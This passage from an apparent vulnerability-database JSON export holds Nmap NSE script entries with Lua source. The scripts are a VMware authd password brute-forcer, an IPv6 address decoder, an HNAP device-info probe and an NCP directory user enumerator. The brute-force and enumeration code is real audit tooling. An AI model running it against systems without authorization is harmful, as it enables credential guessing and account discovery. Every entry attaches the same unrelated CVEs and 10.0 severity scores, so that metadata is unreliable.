902 <ip> --script vmauthd-brute\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 902/tcp open iss-realsecure\n | vmauthd-brute:\n | Accounts\n | root:00000 - Valid credentials\n | Statistics\n |_ Performed 183 guesses in 40 seconds, average tps: 4\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [match](<../lib/match.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-02T11:12:46", "type": "nmap", "title": "vmauthd-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-03-10T03:09:39", "id": "NMAP:VMAUTHD-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/vmauthd-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal match = require \"match\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password auditing against the VMWare Authentication Daemon (vmware-authd).\n]]\n\n---\n-- @usage\n-- nmap -p 902 <ip> --script vmauthd-brute\n--\n-- @output\n-- PORT STATE SERVICE\n-- 902/tcp open iss-realsecure\n-- | vmauthd-brute:\n-- | Accounts\n-- | root:00000 - Valid credentials\n-- | Statistics\n-- |_ Performed 183 guesses in 40 seconds, average tps: 4\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"brute\", \"intrusive\"}\n\n\nportrule = shortport.port_or_service(902, {\"ssl/vmware-auth\", \"vmware-auth\"}, \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\nDriver = {\n\n new = function(self, host, port, options)\n local o = { host = host, port = port }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function(self)\n self.socket = brute.new_socket()\n return self.socket:connect(self.host, self.port)\n end,\n\n login = function(self, username, password)\n local status, line = self.socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n if ( line:match(\"^220 VMware Authentication Daemon.*SSL Required\") ) then\n self.socket:reconnect_ssl()\n end\n\n status = self.socket:send( (\"USER %s\\r\\n\"):format(username) )\n if ( not(status) ) then\n local err = brute.Error:new( \"Failed to send data to server\" )\n err:setRetry( true )\n return false, err\n end\n\n local status, response = self.socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n if ( not(status) or not(response:match(\"^331\") ) ) then\n local err = brute.Error:new( \"Received unexpected response from server\" )\n err:setRetry( true )\n return false, err\n end\n\n status = self.socket:send( (\"PASS %s\\r\\n\"):format(password) )\n if ( not(status) ) then\n local err = brute.Error:new( \"Failed to send data to server\" )\n err:setRetry( true )\n return false, err\n end\n status, response = self.socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n\n if ( response:match(\"^230\") ) then\n return true, creds.Account:new(username, password, creds.State.VALID)\n end\n\n return false, brute.Error:new( \"Login incorrect\" )\n end,\n\n disconnect = function(self)\n return self.socket:close()\n end\n\n}\n\nlocal function checkAuthd(host, port)\n local socket = nmap.new_socket()\n local status = socket:connect(host, port)\n\n if( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n\n local status, line = socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n socket:close()\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n end\n\n if ( not( line:match(\"^220 VMware Authentication Daemon\") ) ) then\n return false, \"Failed to detect VMWare Authentication Daemon\"\n end\n return true\nend\n\n\naction = function(host, port)\n local status, err = checkAuthd(host, port)\n if ( not(status) ) then\n return fail(err)\n end\n\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local result\n status, result = engine:start()\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:45", "description": "Shows extra information about IPv6 addresses, such as embedded MAC or IPv4 addresses when available. \n\nSome IP address formats encode extra information; for example some IPv6 addresses encode an IPv4 address or MAC address. This script can decode these address formats: \n\n * IPv4-compatible IPv6 addresses, \n * IPv4-mapped IPv6 addresses, \n * Teredo IPv6 addresses, \n * 6to4 IPv6 addresses, \n * IPv6 addresses using an EUI-64 interface ID, \n * IPv4-embedded IPv6 addresses, \n * IPv4-translated IPv6 addresses and \n * ISATAP Modified EUI-64 IPv6 addresses. \n\nSee RFC 4291 for general IPv6 addressing architecture and the definitions of some terms.\n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n Nmap scan report for ::1.2.3.4\n Host script results:\n | address-info:\n | IPv4-compatible:\n |_ IPv4 address: 1.2.3.4\n \n Nmap scan report for ::ffff:1.2.3.4\n Host script results:\n | address-info:\n | IPv4-mapped:\n |_ IPv4 address: 1.2.3.4\n \n Nmap scan report for 2001:0:506:708:282a:3d75:fefd:fcfb\n Host script results:\n | address-info:\n | Teredo:\n | Server IPv4 address: 5.6.7.8\n | Client IPv4 address: 1.2.3.4\n |_ UDP port: 49802\n \n Nmap scan report for 2002:102:304::1\n Host script results:\n | address-info:\n | 6to4:\n |_ IPv4 address: 1.2.3.4\n \n Nmap scan report for fe80::a8bb:ccff:fedd:eeff\n Host script results:\n | address-info:\n | IPv6 EUI-64:\n | MAC address:\n | address: aa:bb:cc:dd:ee:ff\n |_ manuf: Unknown\n \n Nmap scan report for 64:ff9b::c000:221\n Host script results:\n | address-info:\n | IPv4-embedded IPv6 address:\n |_ IPv4 address: 192.0.2.33\n \n Nmap scan report for ::ffff:0:c0a8:101\n Host script results:\n | address-info:\n | IPv4-translated IPv6 address:\n |_ IPv4 address: 192.168.1.1\n\n## Requires \n\n * [datafiles](<../lib/datafiles.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-08-23T10:36:16", "type": "nmap", "title": "address-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2021-04-07T18:42:28", "id": "NMAP:ADDRESS-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/address-info.html", "sourceData": "local datafiles = require \"datafiles\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nShows extra information about IPv6 addresses, such as embedded MAC or IPv4 addresses when available.\n\nSome IP address formats encode extra information; for example some IPv6\naddresses encode an IPv4 address or MAC address. This script can decode\nthese address formats:\n* IPv4-compatible IPv6 addresses,\n* IPv4-mapped IPv6 addresses,\n* Teredo IPv6 addresses,\n* 6to4 IPv6 addresses,\n* IPv6 addresses using an EUI-64 interface ID,\n* IPv4-embedded IPv6 addresses,\n* IPv4-translated IPv6 addresses and\n* ISATAP Modified EUI-64 IPv6 addresses.\n\nSee RFC 4291 for general IPv6 addressing architecture and the\ndefinitions of some terms.\n]]\n\n---\n-- @output\n-- Nmap scan report for ::1.2.3.4\n-- Host script results:\n-- | address-info:\n-- | IPv4-compatible:\n-- |_ IPv4 address: 1.2.3.4\n--\n-- Nmap scan report for ::ffff:1.2.3.4\n-- Host script results:\n-- | address-info:\n-- | IPv4-mapped:\n-- |_ IPv4 address: 1.2.3.4\n--\n-- Nmap scan report for 2001:0:506:708:282a:3d75:fefd:fcfb\n-- Host script results:\n-- | address-info:\n-- | Teredo:\n-- | Server IPv4 address: 5.6.7.8\n-- | Client IPv4 address: 1.2.3.4\n-- |_ UDP port: 49802\n--\n-- Nmap scan report for 2002:102:304::1\n-- Host script results:\n-- | address-info:\n-- | 6to4:\n-- |_ IPv4 address: 1.2.3.4\n--\n-- Nmap scan report for fe80::a8bb:ccff:fedd:eeff\n-- Host script results:\n-- | address-info:\n-- | IPv6 EUI-64:\n-- | MAC address:\n-- | address: aa:bb:cc:dd:ee:ff\n-- |_ manuf: Unknown\n--\n-- Nmap scan report for 64:ff9b::c000:221\n-- Host script results:\n-- | address-info:\n-- | IPv4-embedded IPv6 address:\n-- |_ IPv4 address: 192.0.2.33\n--\n-- Nmap scan report for ::ffff:0:c0a8:101\n-- Host script results:\n-- | address-info:\n-- | IPv4-translated IPv6 address:\n-- |_ IPv4 address: 192.168.1.1\n\n-- * ISATAP. RFC 5214.\n-- XXXX:XXXX:XXXX:XX00:0000:5EFE:a.b.c.d\n\n---\n--@xmloutput\n-- <table key=\"IPv4-mapped\">\n-- <elem key=\"IPv4 address\">1.2.3.4</elem>\n-- </table>\n--\n-- <table key=\"IPv4-compatible\">\n-- <elem key=\"IPv4 address\">1.2.3.4</elem>\n-- </table>\n--\n-- <table key=\"Teredo\">\n-- <elem key=\"Server IPv4 address\">5.6.7.8</elem>\n-- <elem key=\"Client IPv4 address\">1.2.3.4</elem>\n-- <elem key=\"UDP port\">49802</elem>\n-- </table>\n--\n-- <table key=\"6to4\">\n-- <elem key=\"IPv4 address\">1.2.3.4</elem>\n-- </table>\n--\n-- <table key=\"IPv6 EUI-64\">\n-- <table key=\"MAC address\">\n-- <elem key=\"address\">aa:bb:cc:dd:ee:ff</elem>\n-- <elem key=\"manuf\">Unknown</elem>\n-- </table>\n-- </table>\n--\n-- <table key=\"IPv4-embedded IPv6 address\">\n-- <elem key=\"IPv4 address\">192.0.2.33</elem>\n-- </table>\n--\n-- <table key=\"IPv4-translated IPv6 address\">\n-- <elem key=\"IPv4 address\">192.168.1.1</elem>\n-- </table>\n\nauthor = \"David Fifield\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"safe\"}\n\n\nhostrule = function(host)\n return true\nend\n\n-- Match an address (array of bytes) against a hex-encoded pattern. \"XX\" in the\n-- pattern is a wildcard.\nlocal function matches(addr, pattern)\n local octet_patterns\n\n octet_patterns = {}\n for op in pattern:gmatch(\"([%xX][%xX])\") do\n octet_patterns[#octet_patterns + 1] = op\n end\n\n if #addr ~= #octet_patterns then\n return false\n end\n\n for i = 1, #addr do\n local a, op\n\n a = addr[i]\n op = octet_patterns[i]\n if not (op == \"XX\" or a == tonumber(op, 16)) then\n return false\n end\n end\n\n return true\nend\n\nlocal function get_manuf(mac)\n local catch = function() return \"Unknown\" end\n local try = nmap.new_try(catch)\n local mac_prefixes = try(datafiles.parse_mac_prefixes())\n local prefix = string.upper(string.format(\"%02x%02x%02x\", mac[1], mac[2], mac[3]))\n return mac_prefixes[prefix] or \"Unknown\"\nend\n\nlocal function format_mac(mac)\n local out = stdnse.output_table()\n out.address = stdnse.format_mac(string.char(table.unpack(mac)))\n out.manuf = get_manuf(mac)\n return out\nend\n\nlocal function format_ipv4(ipv4)\n local octets\n\n octets = {}\n for _, v in ipairs(ipv4) do\n octets[#octets + 1] = string.format(\"%d\", v)\n end\n\n return table.concat(octets, \".\")\nend\n\nlocal function do_ipv4(addr)\n -- intentionally empty\nend\n\n-- EUI-64 from MAC, RFC 4291.\nlocal function decode_eui_64(eui_64)\n if eui_64[4] == 0xff and eui_64[5] == 0xfe then\n return { (eui_64[1] ~ 0x02),\n eui_64[2], eui_64[3], eui_64[6], eui_64[7], eui_64[8] }\n end\nend\n\nlocal function do_ipv6(addr)\n local label\n local output\n\n output = stdnse.output_table()\n\n if matches(addr, \"0000:0000:0000:0000:0000:0000:0000:0001\") then\n -- ::1 is localhost. Not much to report.\n return nil\n elseif matches(addr, \"0000:0000:0000:0000:0000:0000:XXXX:XXXX\") then\n -- RFC 4291 2.5.5.1.\n local ipv4 = { addr[13], addr[14], addr[15], addr[16] }\n return {[\"IPv4-compatible\"]= { [\"IPv4 address\"] = format_ipv4(ipv4) } }\n elseif matches(addr, \"0000:0000:0000:0000:0000:ffff:XXXX:XXXX\") then\n -- RFC 4291 2.5.5.2.\n local ipv4 = { addr[13], addr[14], addr[15], addr[16] }\n return {[\"IPv4-mapped\"]= { [\"IPv4 address\"] = format_ipv4(ipv4) } }\n elseif matches(addr, \"2001:0000:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX\") then\n -- Teredo, RFC 4380.\n local server_ipv4 = { addr[5], addr[6], addr[7], addr[8] }\n -- RFC 5991 makes the flags mostly meaningless.\n local flags = addr[9] * 256 + addr[10]\n local obs_port = addr[11] * 256 + addr[12]\n local obs_client_ipv4 = { addr[13], addr[14], addr[15], addr[16] }\n local port, client_ipv4\n\n -- Invert obs_port.\n port = obs_port ~ 0xffff\n\n -- Invert obs_client_ipv4.\n client_ipv4 = {}\n for _, octet in ipairs(obs_client_ipv4) do\n client_ipv4[#client_ipv4 + 1] = octet ~ 0xff\n end\n\n output[\"Server IPv4 address\"] = format_ipv4(server_ipv4)\n output[\"Client IPv4 address\"] = format_ipv4(client_ipv4)\n output[\"UDP port\"] = tostring(port)\n\n return {[\"Teredo\"] = output}\n elseif matches(addr, \"0064:ff9b:XXXX:XXXX:00XX:XXXX:XXXX:XXXX\") then\n --IPv4-embedded IPv6 addresses. RFC 6052, Section 2\n\n --skip addr[9]\n if matches(addr,\"0064:ff9b:0000:0000:0000:0000:XXXX:XXXX\") then\n local ipv4 = {addr[13], addr[14], addr[15], addr[16]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[5] ~= 0x01 then\n local ipv4 = {addr[5], addr[6], addr[7], addr[8]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[6] ~= 0x22 then\n local ipv4 = {addr[6], addr[7], addr[8], addr[10]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[7] ~= 0x03 then\n local ipv4 = {addr[7], addr[8], addr[10], addr[11]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[8] ~= 0x44 then\n local ipv4 = {addr[8], addr[10], addr[11], addr[12]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[10] == 0x00 and addr[11] == 0x00 and addr[12] == 0x00 then\n local ipv4 = {addr[13], addr[14], addr[15], addr[16]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n end\n elseif matches(addr, \"0000:0000:0000:0000:ffff:0000:XXXX:XXXX\") then\n -- IPv4-translated IPv6 addresses. RFC 2765, Section 2.1\n return {[\"IPv4-translated IPv6 address\"]=\n {[\"IPv4 address\"] = format_ipv4( {addr[13], addr[14], addr[15], addr[16]})}}\n elseif matches(addr, \"XXXX:XXXX:XXXX:XX00:0000:5efe:XXXX:XXXX\") then\n -- ISATAP. RFC 5214, Appendix A\n -- XXXX:XXXX:XXXX:XX00:0000:5EFE:a.b.c.d\n return {[\"ISATAP Modified EUI-64 IPv6 Address\"]=\n {[\"IPv4 address\"] = format_ipv4( {addr[13], addr[14], addr[15], addr[16]})}}\n end\n\n -- These following use common handling for the Interface ID part\n -- (last 64 bits).\n\n if matches(addr, \"2002:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX\") then\n -- 6to4, RFC 3056.\n local ipv4 = { addr[3], addr[4], addr[5], addr[6] }\n\n label = \"6to4\"\n output[\"IPv4 address\"] = format_ipv4(ipv4)\n end\n\n local mac = decode_eui_64({ addr[9], addr[10], addr[11], addr[12],\n addr[13], addr[14], addr[15], addr[16] })\n if mac then\n output[\"MAC address\"] = format_mac(mac)\n if not label then\n label = \"IPv6 EUI-64\"\n end\n end\n\n if label then\n return {[label]= output}\n end\n -- else no match\nend\n\naction = function(host)\n local addr_s, addr_t\n\n addr_s = host.bin_ip\n addr_t = { string.byte(addr_s, 1, #addr_s) }\n\n if #addr_t == 4 then\n return do_ipv4(addr_t)\n elseif #addr_t == 16 then\n return do_ipv6(addr_t)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:49", "description": "Retrieve hardwares details and configuration information utilizing HNAP, the \"Home Network Administration Protocol\". It is an HTTP-Simple Object Access Protocol (SOAP)-based protocol which allows for remote topology discovery, configuration, and management of devices (routers, cameras, PCs, NAS, etc.)\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script hnap-info -p80,8080 <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 8080/tcp open http-proxy syn-ack\n | hnap-info:\n | Type: GatewayWithWiFi\n | Device: Ingraham\n | Vendor: Linksys\n | Description: Linksys E1200\n | Model: E1200\n | Firmware: 1.0.00 build 11\n | Presentation URL: http://192.168.1.1/\n | SOAPACTIONS:\n | http://purenetworks.com/HNAP1/IsDeviceReady\n | http://purenetworks.com/HNAP1/GetDeviceSettings\n | http://purenetworks.com/HNAP1/SetDeviceSettings\n | http://purenetworks.com/HNAP1/GetDeviceSettings2\n | http://purenetworks.com/HNAP1/SetDeviceSettings2\n \n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [table](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [nmap](<../lib/nmap.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-06-14T05:55:46", "type": "nmap", "title": "hnap-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-07-27T18:21:09", "id": "NMAP:HNAP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/hnap-info.html", "sourceData": "local http = require \"http\"\nlocal table = require \"table\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal slaxml = require \"slaxml\"\nlocal nmap = require \"nmap\"\n\ndescription = [[\nRetrieve hardwares details and configuration information utilizing HNAP, the \"Home Network Administration Protocol\".\nIt is an HTTP-Simple Object Access Protocol (SOAP)-based protocol which allows for remote topology discovery,\nconfiguration, and management of devices (routers, cameras, PCs, NAS, etc.)]]\n\n---\n-- @usage\n-- nmap --script hnap-info -p80,8080 <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 8080/tcp open http-proxy syn-ack\n-- | hnap-info:\n-- | Type: GatewayWithWiFi\n-- | Device: Ingraham\n-- | Vendor: Linksys\n-- | Description: Linksys E1200\n-- | Model: E1200\n-- | Firmware: 1.0.00 build 11\n-- | Presentation URL: http://192.168.1.1/\n-- | SOAPACTIONS:\n-- | http://purenetworks.com/HNAP1/IsDeviceReady\n-- | http://purenetworks.com/HNAP1/GetDeviceSettings\n-- | http://purenetworks.com/HNAP1/SetDeviceSettings\n-- | http://purenetworks.com/HNAP1/GetDeviceSettings2\n-- | http://purenetworks.com/HNAP1/SetDeviceSettings2\n--\n--\n-- @xmloutput\n-- <elem key=\"Type\">GatewayWithWiFi</elem>\n-- <elem key=\"Device\">Ingraham</elem>\n-- <elem key=\"Vendor\">Linksys</elem>\n-- <elem key=\"Description\">Linksys E1200</elem>\n-- <elem key=\"Model\">E1200</elem>\n-- <elem key=\"Firmware\">1.0.00 build 11</elem>\n-- <elem key=\"Presentation URL\">http://192.168.1.1/</elem>\n-- <table key=\"SOAPACTIONS\">\n-- <elem>http://purenetworks.com/HNAP1/IsDeviceReady</elem>\n-- <elem>http://purenetworks.com/HNAP1/GetDeviceSettings</elem>\n-- <elem>http://purenetworks.com/HNAP1/SetDeviceSettings</elem>\n-- <elem>http://purenetworks.com/HNAP1/GetDeviceSettings2</elem>\n-- <elem>http://purenetworks.com/HNAP1/SetDeviceSettings2</elem>\n-- </table>\n-----------------------------------------------------------------------\n\nauthor = \"Gyanendra Mishra\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\n \"safe\",\n \"discovery\",\n \"default\",\n \"version\"\n}\n\n\nportrule = function(host, port)\n return (shortport.http(host,port) and nmap.version_intensity() >= 7)\nend\n\nlocal ELEMENTS = {[\"Type\"] = \"Type\",\n[\"DeviceName\"] = \"Device\",\n[\"VendorName\"] = \"Vendor\",\n[\"ModelDescription\"] = \"Description\",\n[\"ModelName\"] = \"Model\",\n[\"FirmwareVersion\"] = \"Firmware\",\n[\"PresentationURL\"] = \"Presentation URL\",\n[\"string\"] = \"SOAPACTIONS\",\n[\"SubDeviceURLs\"] = \"Sub Device URLs\"}\n\nfunction get_text_callback(store, name)\n if ELEMENTS[name] == nil then return end\n name = ELEMENTS[name]\n if name == 'SOAPACTIONS' or name == 'Sub Device URLs' or name == 'Type' then\n return function(content)\n store[name] = store[name] or {}\n table.insert(store[name], content)\n end\n else\n return function(content)\n store[name] = content\n end\n end\nend\n\nfunction action (host, port)\n\n -- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests\n local status_404, result_404, _ = http.identify_404(host,port)\n if ( status_404 and result_404 == 200 ) then\n stdnse.debug1(\"Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.\", host.ip, port.number)\n return nil\n end\n\n local output = stdnse.output_table()\n local response = http.get(host, port, '/HNAP1')\n if response.status and response.status == 200 then\n local parser = slaxml.parser:new()\n parser._call = {startElement = function(name)\n parser._call.text = get_text_callback(output, name) end,\n closeElement = function(name) parser._call.text = function() return nil end end\n }\n parser:parseSAX(response.body, {stripWhitespace=true})\n\n -- exit if the parser does not return output\n if not next(output) then return nil end\n\n -- set the port verson\n port.version.name = \"hnap\"\n port.version.name_confidence = 10\n port.version.product = output[\"Description\"] or nil\n port.version.version = output[\"Model\"] or nil\n port.version.devicetype = output[\"Type\"] and output[\"Type\"][1] or nil\n port.version.cpe = port.version.cpe or {}\n\n if output[\"Vendor\"] and output[\"Model\"] then\n table.insert(port.version.cpe, \"cpe:/h:\".. output[\"Vendor\"]:lower() .. \":\" .. output[\"Model\"]:lower())\n end\n nmap.set_port_version(host, port, \"hardmatched\")\n\n return output\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:41:11", "description": "Retrieves a list of all eDirectory users from the Novell NetWare Core Protocol (NCP) service.\n\n## Example Usage \n \n \n nmap -sV --script=ncp-enum-users <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 524/tcp open ncp syn-ack\n | ncp-enum-users:\n | CN=admin.O=cqure\n | CN=cawi.OU=finance.O=cqure\n | CN=linux-l84tadmin.O=cqure\n | CN=nist.OU=hr.O=cqure\n | CN=novlxregd.O=cqure\n | CN=novlxsrvd.O=cqure\n | CN=OESCommonProxy_linux-l84t.O=cqure\n | CN=sasi.OU=hr.O=cqure\n |_ CN=wwwrun.O=cqure\n \n\n## Requires \n\n * [ncp](<../lib/ncp.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-05-28T09:01:31", "type": "nmap", "title": "ncp-enum-users NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:NCP-ENUM-USERS.NSE", "href": "https://nmap.org/nsedoc/scripts/ncp-enum-users.html", "sourceData": "local ncp = require \"ncp\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves a list of all eDirectory users from the Novell NetWare Core Protocol (NCP) service.\n]]\n\n---\n--\n--@output\n-- PORT STATE SERVICE REASON\n-- 524/tcp open ncp syn-ack\n-- | ncp-enum-users:\n-- | CN=admin.O=cqure\n-- | CN=cawi.OU=finance.O=cqure\n-- | CN=linux-l84tadmin.O=cqure\n-- | CN=nist.OU=hr.O=cqure\n-- | CN=novlxregd.O=cqure\n-- | CN=novlxsrvd.O=cqure\n-- | CN=OESCommonProxy_linux-l84t.O=cqure\n-- | CN=sasi.OU=hr.O=cqure\n-- |_ CN=wwwrun.O=cqure\n--\n\n-- Version 0.1\n-- Created 04/26/2011 - v0.1 - created by Patrik Karlsson\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"auth\", \"safe\"}\n\n\nportrule = shortport.port_or_service(524, \"ncp\", \"tcp\")\n\naction = function(host, port)\n local helper = ncp.Helper:new(host,port)\n\n local status, resp = helper:connect()\n if ( not(status) ) then return stdnse.format_output(false, resp) end\n\n status, resp = helper:search(\"[Root]\", \"User\", \"*\")\n if ( not(status) ) then return stdnse.format_output(false, resp) end\n\n local output = {}\n\n for _, entry in ipairs(resp) do\n table.insert(output, entry.name)\n end\n\n return stdnse.format_output(true, output)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:43", "description": "Performs simple Path MTU Discovery to target hosts. \n\nTCP or UDP packets are sent to the host with the DF (don't fragment) bit set and with varying amounts of data. If an ICMP Fragmentation Needed is received, or no reply is received after retransmissions, the amount of data is lowered and another packet is sent. This continues until (assuming no errors occur) a reply from the final host is received, indicating the packet reached the host without being fragmented. \n\nNot all MTUs are attempted so as to not expend too much time or network resources. Currently the relatively short list of MTUs to try contains the plateau values from Table 7-1 in RFC 1191, \"Path MTU Discovery\". Using these values significantly cuts down the MTU search space. On top of that, this list is rarely traversed in whole because: 